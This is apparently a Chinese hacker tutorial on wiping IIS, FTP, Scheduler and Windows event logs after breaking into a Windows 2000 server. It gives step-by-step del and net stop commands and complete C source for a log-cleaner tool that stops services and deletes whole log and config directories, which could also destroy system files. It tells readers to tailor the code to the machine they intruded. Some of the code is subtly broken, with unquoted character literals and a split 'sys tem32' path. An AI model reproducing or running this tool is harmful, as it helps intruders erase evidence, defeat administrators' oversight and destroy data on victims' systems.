Windows2000的日志文件通常有應用程序日志,安全日志、系統日志、DNS服務器日志、
FTP日志、WWW日志等等,可能會根據服務器所開啟的服務不同。
一般步驟如下:
1.清除IIs的日志。
可不要小看IIS的日志功能,它可以詳細的記錄下你的入侵全過程,如
如你用unicode入侵時ie裡打的命令,和對80端口掃描時留下的痕跡。你可能就因為對
其不注意,而被網管盯上,說不定還會.......呵呵
那我們就可手動清除吧
1.日志的默認位置:%systemroot%\system32\logfiles\w3svc1\,默認每天一個日志
那我們就切換到這個目錄下吧
del *.*
你大概想是安全了吧,那就dir一下吧
咦,咦,今天的日志怎麼還在,不要慌。因為w3svc服務還開著,那我們怎麼清除這個日志文件呢?
方法一:如有3389可以登錄,那就用notepad打開,把Ctrl+A 然後del吧。
方法二:net 命令
C:\>net stop w3svc
World Wide Web Publishing Service 服務正在停止.(可能會等很長的時間,也可能不成功)
World Wide Web Publishing Service 服務已成功停止。
好了w3svc停止了,我們可以清空它的日志了,del *.*吧
還有不要忘了再打開w3svc服務呀
C:\>net start w3svc
2.清除ftp日志。
FTP日志默認位置:%systemroot%\sys tem32\logfiles\msftpsvc1\,默認每天一個日志
清除方法同上
3.清除Scheduler日志
Scheduler服務日志默認位置:%systemroot%\schedlgu.txt
清除方法同上
4.應用程序日志、安全日志、系統日志、DNS日志默認位置:%systemroot%\sys tem32\config
清除方法同上
注意以上三個目錄可能不在上面的位置,那是因為管理員做的修改
可以讀取注冊表值得到他們的位置
應用程序日志,安全日志,系統日志,DNS服務器日志,它們這些LOG文件在注冊表中的:
HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog
Schedluler服務日志在注冊表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
5.我是借鑒了別人文章(其實就是抄了)
OK!恭喜,現在簡單的日志都已成功刪除。下面就是很難的安全日志和系統日志了,守護這些日志的服務是Event Log,試著停掉它!
D:\SERVER\sys tem32\LogFiles\W3SVC1>net stop eventlog
這項服務無法接受請求的 "暫停" 或 "停止" 操作。
KAO,I 服了 U,沒辦法,它是關鍵服務。如果不用第三方工具,在命令行上根本沒有刪除安全日志和系統日志的可能!所以還是得用雖然簡單但是速度慢得死機的辦法:打開“控制面板”的“管理工具”中的“事件查看器”(98沒有,知道用Win2k的好處了吧),在菜單的“操作”項有一個名為“連接到另一台計算機”的菜單,點擊它如下圖所示:
輸入遠程計算機的IP,然後點支煙,等上數十分鐘,忍受象死機的折磨,然後打開下圖:
選擇遠程計算機的安全性日志,右鍵選擇它的屬性:
點擊屬性裡的“清除日志”按鈕,OK!安全日志清除完畢!同樣的忍受痛苦去清除系統日志!
6.上面大部分重要的日志你都已經清除了。然後要做的就是以防萬一還有遺漏的了。
那就這樣做吧 del以下的一些文件
\winnt\*.log
system32下
\logfiles\*.*
\dtclog\*.*
\config\*.evt
\*.log
\*.txt
到目前為止,我所知的大部分的日志我們已經教會了你清除的方法,那你就學以致用吧。
其實這篇文章的主要日的,不是教你怎麼清除日志,而是教你寫一個日志清除的工具。
就當我前面說的都是屁話吧。
現在轉入正題:
前面你已經看到了要清除全部的日志的過程,是不是很繁呀,手動可是要花不少時間。有時
候還不一定可以清除干淨。那就於編程的朋友來說,那就會想,可以我會編程,我怕什麼。
那我們就動手吧。
你已經了解了,要清除一些日志,首先要關閉一些服務程序
那我就先教你怎麼寫一個可以看機器的服務程序的dos小工具吧,具體實現看我以前的文章
《如果做一個dos下的服務程序查看器》
工具名serName.exe
運行一下serName.exe吧
serName.exe -t 1 -t 1
呵呵,所有的機器正在運行的服務程序顯示出來了吧。
記住你要關的服務程序名吧,下面會有用的。
那編程的第二步就是實現關w3svc和shedule還有ftp等服務程序了。
我寫的代碼如下
對著msdn慢慢看吧。(不難的,有什麼不懂不要來問我)
void StopServices(LPCTSTR lpServiceName)
{
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_STOP);
if(sh)
{
BOOL bControl;
SERVICE_STATUS ServiceStatus;
bControl=ControlService(sh,SERVICE_CONTROL_STOP,&ServiceStatus);
DWORD dwControl;
if(bControl)
{
printf("success to stop the service \"%s\"\n",lpServiceName);
}
else
{
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with the necessary access.\n");break;
case ERROR_SERVICE_NOT_ACTIVE :printf("The service has not been started.\n");break;
case ERROR_DEPENDENT_SERVICES_RUNNING :printf("The service cannot be stopped because other running services are dependent on it.\n");break;
case ERROR_INVALID_SERVICE_CONTROL:printf("The requested control code is not valid, or it is unacceptable to the service.\n");break;
case ERROR_SERVICE_CANNOT_ACCEPT_CTRL:printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n");break;
case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.\n");break;
}
}
}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return;
}
函數有了,那就寫個main函數試試吧
void main()
{
StopServices("W3SVC");
return;
}
ok.成功了,如果沒有成功,請參照輸出的錯誤提示。
好了有了一個可以停止的服務程序的函數,
那我們還需要一個可以開啟服務程序的函數
其實以上的看懂了,下面的代碼只是對上面的代碼的一些小變動。
void StartServices(LPCTSTR lpServiceName)
{
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_START);
if(sh)
{
BOOL bControl;
bControl=StartService(sh,1,&lpServiceName);
DWORD dwControl;
if(bControl)
{
printf("success to start the service \"%s\"\n",lpServiceName);
}
else
{
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_START access.\n");break;
case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.\n");break;
case ERROR_PATH_NOT_FOUND :printf("The service binary file could not be found.\n");break;
case ERROR_SERVICE_ALREADY_RUNNING:printf("An instance of the service is already running.\n");break;
case ERROR_SERVICE_DATABASE_LOCKED:printf("The database is locked.\n");break;
case ERROR_SERVICE_DEPENDENCY_DELETED:printf("The service depends on a service that does not exist or has been marked for deletion.\n");break;
case ERROR_SERVICE_DEPENDENCY_FAIL:printf("The service depends on another service that has failed to start.\n");break;
case ERROR_SERVICE_DISABLED:printf("The service has been disabled.\n");break;
case ERROR_SERVICE_LOGON_FAILED:printf("The service could not be logged on.\n");break;
case ERROR_SERVICE_MARKED_FOR_DELETE:printf("The service has been marked for deletion.\n");break;
case ERROR_SERVICE_NO_THREAD:printf("A thread could not be created for the service.\n");break;
case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.\n");break;
}
}
}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return;
}
呵呵,只是一些小變動。
現在你已經有了這兩樣武器,那下面的就是動用上面第一部分的一些知識,去del文件了,我想不用我教,你也一定想到怎麼做了吧。
現在那再教第三個武器吧,雖然他對我們的程序可有可無,但對一個漂亮的程序他卻是必需的,那就是一個判斷服務程序狀態的函數。
我的代碼如下。
DWORD GetServicesState(LPCTSTR lpServiceName)
{
DWORD dwState;
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_QUERY_STATUS);
if(sh)
{
BOOL bQuery;
SERVICE_STATUS ServiceStatus;
bQuery=QueryServiceStatus(sh,&ServiceStatus);
if(!bQuery)
{
DWORD dwControl;
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n");break;
case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.\n");break;
}
dwState=0;
}
else
{
dwState=ServiceStatus.dwCurrentState;
}
}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return dwState;
}
好了現在什麼都有了,那就把代碼完成吧。
其他代碼如下。希望你在運行前安照你入侵的系統的具體情況修改一下源代碼。
//==========================================================//
// 綠兵日志Cleaner1.0 //
// Compiled by http://www.vertarmy.com 綠色兵團 //
// http://vcghost.yeah.net 編の魂(tryibest) //
// [email protected] //
// //
//==========================================================//
#include "windows.h"
#include "stdio.h"
void StopServices(LPCTSTR lpServiceName);
void StartServices(LPCTSTR lpServiceName);
DWORD GetServicesState(LPCTSTR lpServiceName);
void DelFiles(LPCTSTR lpFileName,LPCTSTR lpDirectory);
void Del3WFile();
void DelFtpFile();
void DelSheduleFile();
void DelOtherFile();
void ShowTitle();
void main(int argc, char *argv[])
{
ShowTitle();
DelOtherFile();
Del3WFile();
DelFtpFile();
DelSheduleFile();
ShowTitle();
return;
}
void StopServices(LPCTSTR lpServiceName)
{
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_STOP);
if(sh)
{
BOOL bControl;
SERVICE_STATUS ServiceStatus;
bControl=ControlService(sh,SERVICE_CONTROL_STOP,&ServiceStatus);
DWORD dwControl;
if(bControl)
{
printf("success to stop the service \"%s\"\n",lpServiceName);
}
else
{
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with the necessary access.\n");break;
case ERROR_SERVICE_NOT_ACTIVE :printf("The service has not been started.\n");break;
case ERROR_DEPENDENT_SERVICES_RUNNING :printf("The service cannot be stopped because other running services are dependent on it.\n");break;
case ERROR_INVALID_SERVICE_CONTROL:printf("The requested control code is not valid, or it is unacceptable to the service.\n");break;
case ERROR_SERVICE_CANNOT_ACCEPT_CTRL:printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n");break;
case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.\n");break;
}
}
}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return;
}
void StartServices(LPCTSTR lpServiceName)
{
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_START);
if(sh)
{
BOOL bControl;
bControl=StartService(sh,1,&lpServiceName);
DWORD dwControl;
if(bControl)
{
printf("success to start the service \"%s\"\n",lpServiceName);
}
else
{
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_START access.\n");break;
case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.\n");break;
case ERROR_PATH_NOT_FOUND :printf("The service binary file could not be found.\n");break;
case ERROR_SERVICE_ALREADY_RUNNING:printf("An instance of the service is already running.\n");break;
case ERROR_SERVICE_DATABASE_LOCKED:printf("The database is locked.\n");break;
case ERROR_SERVICE_DEPENDENCY_DELETED:printf("The service depends on a service that does not exist or has been marked for deletion.\n");break;
case ERROR_SERVICE_DEPENDENCY_FAIL:printf("The service depends on another service that has failed to start.\n");break;
case ERROR_SERVICE_DISABLED:printf("The service has been disabled.\n");break;
case ERROR_SERVICE_LOGON_FAILED:printf("The service could not be logged on.\n");break;
case ERROR_SERVICE_MARKED_FOR_DELETE:printf("The service has been marked for deletion.\n");break;
case ERROR_SERVICE_NO_THREAD:printf("A thread could not be created for the service.\n");break;
case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.\n");break;
}
}
}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return;
}
DWORD GetServicesState(LPCTSTR lpServiceName)
{
DWORD dwState;
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_QUERY_STATUS);
if(sh)
{
BOOL bQuery;
SERVICE_STATUS ServiceStatus;
bQuery=QueryServiceStatus(sh,&ServiceStatus);
if(!bQuery)
{
DWORD dwControl;
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n");break;
case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.\n");break;
}
dwState=0;
}
else
{
dwState=ServiceStatus.dwCurrentState;
}
}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return dwState;
}
void DelFiles(LPCTSTR lpFileName,LPCTSTR lpDirectory)
{
TCHAR tcFileName[1024];
HANDLE hFile;
WIN32_FIND_DATA FindFileData;
hFile=FindFirstFile(lpFileName,&FindFileData);
if(hFile!=INVALID_HANDLE_VALUE)
{
while(1)
{
lstrcpy(tcFileName,lpDirectory);
lstrcat(tcFileName,FindFileData.cFileName);
BOOL dDel=DeleteFile(tcFileName);
if(dDel)
{
printf("delete file \"%s\" success\n",tcFileName);
}
else
{
printf("delte file \"%s\" fail\n",tcFileName);
}
if(!FindNextFile(hFile,&FindFileData))
{
break;
}
}
}
FindClose(hFile);
}
void Del3WFile()
{
TCHAR tcSystemDirectory[1024];
::GetSystemDirectory(tcSystemDirectory,1024);
TCHAR tc3WDirectory[1024];
TCHAR tc3WFile[1024];
lstrcpy(tc3WDirectory,tcSystemDirectory);
lstrcpy(tc3WFile,tcSystemDirectory);
lstrcat(tc3WFile,"\\logfiles\\w3svc1\\*.log");
lstrcat(tc3WDirectory,"\\logfiles\\w3svc1\\");
DWORD dwState;
dwState=GetServicesState("w3svc");
if(dwState==SERVICE_RUNNING)
{
StopServices("w3svc");
::Sleep(1000);
DelFiles(tc3WFile,tc3WDirectory);
::Sleep(1000);//應該考慮用線程
StartServices("w3svc");
}
else
{
DelFiles(tc3WFile,tc3WDirectory);
}
}
void DelFtpFile()
{
TCHAR tcSystemDirectory[1024];
::GetSystemDirectory(tcSystemDirectory,1024);
TCHAR tcFtpDirectory[1024];
TCHAR tcFtpFile[1024];
lstrcpy(tcFtpDirectory,tcSystemDirectory);
lstrcpy(tcFtpFile,tcSystemDirectory);
lstrcat(tcFtpFile,"\\logfiles\\msftpsvc1\\*.log");
lstrcat(tcFtpDirectory,"\\logfiles\\msftpsvc1\\");
DWORD dwState;
dwState=GetServicesState("msftpsvc");
if(dwState==SERVICE_RUNNING)
{
StopServices("msftpsvc");
::Sleep(1000);
DelFiles(tcFtpFile,tcFtpDirectory);
::Sleep(1000);//應該考慮用線程
StartServices("msftpsvc");
}
else
{
DelFiles(tcFtpFile,tcFtpDirectory);
}
}
void DelSheduleFile()
{
TCHAR tcSystemDirectory[1024];
::GetSystemDirectory(tcSystemDirectory,1024);
TCHAR tcScheduleFile[1024];
lstrcpy(tcScheduleFile,tcSystemDirectory);
int iLength=lstrlen(tcScheduleFile);
while(1)
{
iLength--;
if(tcScheduleFile[iLength]==\\)
break;
}
tcScheduleFile[iLength]=\0;
lstrcat(tcScheduleFile,"\\SchedLgU.txt");
DWORD dwState;
dwState=GetServicesState("schedule");
if(dwState==SERVICE_RUNNING)
{
StopServices("schedule");
::Sleep(1000);
BOOL dDel=DeleteFile(tcScheduleFile);
if(dDel)
{
printf("delete file \"%s\" success\n",tcScheduleFile);
}
else
{
printf("delte file \"%s\" fail\n",tcScheduleFile);
}
// DelFiles(tcScheduleFile,tcScheduleDirectory);
::Sleep(1000);//應該考慮用線程
StartServices("schedule");
}
else
{
BOOL dDel=DeleteFile(tcScheduleFile);
if(dDel)
{
printf("delete file \"%s\" success\n",tcScheduleFile);
}
else
{
printf("delte file \"%s\" fail\n",tcScheduleFile);
}
// DelFiles(tcScheduleFile,tcScheduleDirectory);
}
}
void DelOtherFile()
{
TCHAR tcSystemDirectory[1024];
::GetSystemDirectory(tcSystemDirectory,1024);
TCHAR tcOtherFile[1024];
TCHAR tcOtherDirectory[1024];
//刪除logfiles下全部文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\logfiles\\*.*");
lstrcat(tcOtherDirectory,"\\logfiles\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//刪除dtclog下全部文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\dtclog\\*.*");
lstrcat(tcOtherDirectory,"\\dtclog\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//刪除config下全部文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\config\\*.*");
lstrcat(tcOtherDirectory,"\\config\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//刪除system32下全部log文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\*.log");
lstrcat(tcOtherDirectory,"\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//刪除system32下全部的txt文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\*.txt");
lstrcat(tcOtherDirectory,"\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//得到\winnt\目錄路徑
TCHAR tcWinDirectory[1024];
lstrcpy(tcWinDirectory,tcSystemDirectory);
int iLength=lstrlen(tcWinDirectory);
while(1)
{
iLength--;
if(tcWinDirectory[iLength]==\\)
break;
}
tcWinDirectory[iLength]=\0;
//刪除\winnt\*.log
lstrcpy(tcOtherFile,tcWinDirectory);
lstrcpy(tcOtherDirectory,tcWinDirectory);
lstrcat(tcOtherFile,"\\*.log");
lstrcat(tcOtherDirectory,"\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//刪除\winnt\*.txt
lstrcpy(tcOtherFile,tcWinDirectory);
lstrcpy(tcOtherDirectory,tcWinDirectory);
lstrcat(tcOtherFile,"\\*.txt");
lstrcat(tcOtherDirectory,"\\");
DelFiles(tcOtherFile,tcOtherDirectory);
}
void ShowTitle()
{
printf("===========================================================\n");
printf("$ 綠兵日志Cleaner1.0 $\n");
printf("$ Compiled by http://www.vertarmy.com 綠色兵團 $\n");
printf("$ http://vcghost.yeah.net 編の魂(tryibest) $\n");
printf("$ [email protected] $\n");
printf("===========================================================\n");
}
